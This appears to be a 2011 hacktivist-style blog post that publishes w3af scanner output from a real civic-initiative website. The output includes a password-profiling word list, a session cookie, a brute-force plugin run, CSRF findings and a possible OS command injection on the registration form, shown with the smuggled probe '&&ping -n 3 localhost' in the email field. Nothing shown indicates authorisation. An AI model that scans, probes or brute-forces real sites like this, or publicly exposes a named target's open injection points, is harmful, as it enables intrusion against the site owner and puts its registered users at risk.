Wednesday, May 25, 2011

Iniciativa Mexico vulnerable

Greetings, Free World.

http://www.iniciativamexico.org

[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.collectCookies
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.error500
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.getMails
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.lang
[Wed 25 May 2011 03:26:56 PM CDT] The page language is: es
[Wed 25 May 2011 03:26:57 PM CDT] The server header for the remote web server is: "nginx/0.7.67". This information was found in the request with id 194.
[Wed 25 May 2011 03:27:18 PM CDT] A fake FrontPage Configuration Information file was found at: "http://www.iniciativamexico.org/_vti_inf.html". This may be an indication of a honeypot, a WAF or an IPS. This information was found in the request with id 244.
[Wed 25 May 2011 03:27:18 PM CDT] New URL found by frontpage_version plugin: http://www.iniciativamexico.org/_vti_inf.html
[Wed 25 May 2011 03:27:18 PM CDT] Starting formAuthBrute plugin execution.
[Wed 25 May 2011 03:27:18 PM CDT] Starting basicAuthBrute plugin execution.
[Wed 25 May 2011 03:27:18 PM CDT] Found 4 URLs and 10 different points of injection.
[Wed 25 May 2011 03:27:18 PM CDT] The list of URLs is:
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/_vti_inf.html
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/save_invitacion
[Wed 25 May 2011 03:27:18 PM CDT] The list of fuzzable requests is:
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org | Method: GET
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/_vti_inf.html | Method: GET
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="1", data[iniciativa][tu_iniciativa_es]="2", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="5", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="1", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="0", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="1", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="3", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="1", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="5", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="2", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="0", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="2", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="3", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="2", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="5", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/save_invitacion | Method: POST | Parameters: (data[Friend][mail]="E-mail de ...", _method="POST", data[Prospect][nombre]="Tu Nombre ...", data[Prospect][mail]="Tu e-mail:")
[Wed 25 May 2011 03:27:25 PM CDT] The web application sent a persistent cookie.
[Wed 25 May 2011 03:27:25 PM CDT] The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):
[Wed 25 May 2011 03:27:25 PM CDT] - The URL: http://www.iniciativamexico.org/save_invitacion is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Wed 25 May 2011 03:27:25 PM CDT] - The URL: http://www.iniciativamexico.org/registro_corto is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Wed 25 May 2011 03:27:45 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:31:06 PM CDT] Too many retries (2) while requesting: http://www.iniciativamexico.org/save_invitacion
[Wed 25 May 2011 03:31:06 PM CDT] The URL: http://www.iniciativamexico.org/registro_corto is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Wed 25 May 2011 03:31:06 PM CDT] The URL: http://www.iniciativamexico.org/save_invitacion is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Wed 25 May 2011 03:31:06 PM CDT] A fake FrontPage Configuration Information file was found at: "http://www.iniciativamexico.org/_vti_inf.html". This may be an indication of a honeypot, a WAF or an IPS. This information was found in the request with id 244.
[Wed 25 May 2011 03:31:06 PM CDT] The server header for the remote web server is: "nginx/0.7.67". This information was found in the request with id 194.
[Wed 25 May 2011 03:31:06 PM CDT] The URL "http://www.iniciativamexico.org/" has the following allowed methods: GET, HEAD, POST.
[Wed 25 May 2011 03:31:36 PM CDT] Too many retries (2) while requesting: http://www.iniciativamexico.org/registro_corto
[Wed 25 May 2011 03:45:43 PM CDT] A possible OS Commanding was found at: "http://www.iniciativamexico.org/registro_corto", using HTTP method POST. The sent post-data was: "...data[usuario][mail1]=&&ping -n 3 localhost..."Please review manually. This information was found in the request with id 5175.
[Wed 25 May 2011 03:47:11 PM CDT] The "passwordProfiling" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Wed 25 May 2011 03:50:40 PM CDT] The "passwordProfiling" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Wed 25 May 2011 03:51:47 PM CDT] The length of both pages are zero. Cant work with this.
[Wed 25 May 2011 03:51:57 PM CDT] The length of both pages are zero. Cant work with this.
[Wed 25 May 2011 03:56:48 PM CDT] The length of both pages are zero. Cant work with this.
[Wed 25 May 2011 03:57:43 PM CDT] Too many retries (2) while requesting: http://www.iniciativamexico.org/registro_corto
[Wed 25 May 2011 03:58:13 PM CDT] Too many retries (2) while requesting: http://www.iniciativamexico.org/registro_corto
[Wed 25 May 2011 04:10:52 PM CDT] Password profiling TOP 100:
[Wed 25 May 2011 04:10:52 PM CDT] - [1] Iniciativa with 1798 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [2] participar with 1794 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [3] case with 1495 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [4] INICIATIVA with 1495 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [5] Porque with 1495 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [6] proyectos with 1200 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [7] ideas with 897 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [8] mexicano with 897 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [9] Registro with 897 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [10] Agosto with 897 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [11] proyecto with 897 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [12] cultura with 606 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [13] naturales with 606 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [14] empresas with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [15] necesitas with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [16] gran with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [17] idea with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [18] semifinalistas with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [19] finales with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [20] como with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [21] ahora with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [22] iniciativas with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [23] Registra with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [24] medios with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [25] Cobertura with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [26] comunidades with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [27] Conoce with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [28] impacto with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [29] Julio with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [30] Consejo with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [31] Informativa with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [32] Existen with 360 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [33] errores with 360 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [34] formulario with 360 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [35] salud with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [36] agua with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [37] cultural with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [38] Derechos with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [39] derechos with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [40] Preguntas with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [41] basura with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [42] democracia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [43] Todos with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [44] actividad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [45] desastres with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [46] especies with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [47] transparencia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [48] Frecuentes with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [49] identidad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [50] Contacto with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [51] aprendizaje with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [52] legalidad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [53] ciencia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [54] justicia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [55] arte with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [56] reciclaje with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [57] familia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [58] vivienda with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [59] adicciones with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [60] Privacidad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [61] servicios with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [62] cuidado with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [63] fuentes with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [64] seguridad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [65] empleo with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [66] equidad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [67] productivos with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [68] infancia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [69] juventud with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [70] espacios with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [71] transporte with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [72] cambio with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [73] escasez with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [74] libre with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [75] manera with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [76] Junio with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [77] tener with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [78] Bases with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [79] Museo with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [80] primer with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [81] nuestro with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [82] mejores with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [83] separados with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [84] vida with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [85] Programas with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [86] requiere with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [87] requisitos with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [88] buscas with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [89] quieres with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [90] return with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [91] fortalecer with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [92] Ventures with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [93] Proyectos with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [94] previo with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [95] Resultados with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [96] Importantes with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [97] mucho with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [98] forman with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [99] ejemplares with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [100] consentimiento with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] The cookie: "CAKEPHP=g5i4raul0ohnendqo9k10d5ap6; expires=Mon, 30-Jan-2012 20:27:24 GMT; path=/" was sent by these URLs:
[Wed 25 May 2011 04:10:52 PM CDT] - http://www.iniciativamexico.org/
[Wed 25 May 2011 04:10:52 PM CDT] Finished scanning process.


osCommanding

A possible OS Commanding was found at: "http://www.iniciativamexico.org/registro_corto", using HTTP method POST. The sent post-data was: "...data[usuario][mail1]=&&ping -n 3 localhost..."Please review manually. This information was found in the request with id 5175.

GET http://www.iniciativamexico.org/ HTTP/1.1
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)
Host: www.iniciativamexico.org
Cookie: CAKEPHP=g5i4raul0ohnendqo9k10d5ap6
Content-type: application/x-www-form-urlencoded


xsrf

posr_xsrf

Cross-Site Request Forgery vulnerability

The URL: http://www.iniciativamexico.org/registro_corto is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.

The URL: http://www.iniciativamexico.org/save_invitacion is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.

Here is a video: http://www.youtube.com/watch?v=CiXEFD-cTnw&feature=player_embedded

There you have it.

Greetings, Free World
